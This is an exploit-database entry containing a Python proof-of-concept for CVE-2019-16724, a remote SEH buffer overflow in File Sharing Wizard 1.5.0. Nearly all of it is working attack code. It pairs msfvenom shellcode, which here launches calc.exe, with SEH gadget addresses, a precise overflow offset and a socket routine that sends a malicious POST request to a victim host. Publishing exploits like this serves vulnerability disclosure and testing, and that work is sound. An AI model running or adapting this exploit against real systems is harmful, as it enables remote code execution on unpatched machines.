File Sharing Wizard 1.5.0 - POST SEH Overflow

EDB-ID:

47412


Author:

x00pwn

Type:

remote


Platform:

Windows

Date:

2019-09-24


import socket
from struct import *

# Exploit Title: File sharing wizard 'post' remote SEH overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Software Link: https://file-sharing-wizard.soft112.com/
# Version: 1.5.0
# Tested on: Windows 7
# CVE : CVE-2019-16724

# File-sharing-wizard-seh

#----------------------------------------------#
# Bad characters: \x00        #
# SEH value:  0x909032EB  (JMP short)    #
# NSEH value: 0x7c38a67f (POP POP RET)  #
#----------------------------------------------#

#  Assigned CVE ID : CVE-2019-16724

victim_host = "10.0.0.17"
victim_port = 80

# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode EXITFUNC=seh
shellcode =  ""
shellcode += "\xd9\xc7\xd9\x74\x24\xf4\xba\x65\x1d\x84\xe1\x5f"
shellcode += "\x29\xc9\xb1\x31\x31\x57\x18\x03\x57\x18\x83\xef"
shellcode += "\x99\xff\x71\x1d\x89\x82\x7a\xde\x49\xe3\xf3\x3b"
shellcode += "\x78\x23\x67\x4f\x2a\x93\xe3\x1d\xc6\x58\xa1\xb5"
shellcode += "\x5d\x2c\x6e\xb9\xd6\x9b\x48\xf4\xe7\xb0\xa9\x97"
shellcode += "\x6b\xcb\xfd\x77\x52\x04\xf0\x76\x93\x79\xf9\x2b"
shellcode += "\x4c\xf5\xac\xdb\xf9\x43\x6d\x57\xb1\x42\xf5\x84"
shellcode += "\x01\x64\xd4\x1a\x1a\x3f\xf6\x9d\xcf\x4b\xbf\x85"
shellcode += "\x0c\x71\x09\x3d\xe6\x0d\x88\x97\x37\xed\x27\xd6"
shellcode += "\xf8\x1c\x39\x1e\x3e\xff\x4c\x56\x3d\x82\x56\xad"
shellcode += "\x3c\x58\xd2\x36\xe6\x2b\x44\x93\x17\xff\x13\x50"
shellcode += "\x1b\xb4\x50\x3e\x3f\x4b\xb4\x34\x3b\xc0\x3b\x9b"
shellcode += "\xca\x92\x1f\x3f\x97\x41\x01\x66\x7d\x27\x3e\x78"
shellcode += "\xde\x98\x9a\xf2\xf2\xcd\x96\x58\x98\x10\x24\xe7"
shellcode += "\xee\x13\x36\xe8\x5e\x7c\x07\x63\x31\xfb\x98\xa6"
shellcode += "\x76\xfd\x69\x7b\x62\x6a\xd0\xee\xcf\xf6\xe3\xc4"
shellcode += "\x13\x0f\x60\xed\xeb\xf4\x78\x84\xee\xb1\x3e\x74"
shellcode += "\x82\xaa\xaa\x7a\x31\xca\xfe\x18\xd4\x58\x62\xf1"
shellcode += "\x73\xd9\x01\x0d"

nseh = pack ('<I',0x909032EB) # Short jump forward 32 places into NOP sled
seh = pack('I',0x7c38a67f) # POP POP RET

# 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files (x86)\File Sharing Wizard\bin\MSVCR71.dll)

exploit_payload  = "A" * 1040
exploit_payload += nseh # JMP short
exploit_payload += seh # POPPOPRET
exploit_payload += "\x90" * 100 # NOPSLED
exploit_payload += shellcode # popping calc.exe
exploit_payload += "D" *(5000 - len(exploit_payload))

payload_header  = "POST " + exploit_payload
payload_header +=" HTTP/1.0\r\n\r\n"

# overflowed SEH handler - 42386942 : [*] Exact match at offset 1044

try:
print("""
--------------------------------
CVE-2019-16724 proof of concept
File sharing wizard SEH overflow
--------------------------------
""")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("[x] Setting up a socket connection")
expl.connect((victim_host, victim_port))
print("[x] Establishing a connection to the victim")
expl.send(payload_header)
print("[x] Sending ")
except:
print("[!] Error establishing a connection")
print("[!] Error sending exploit")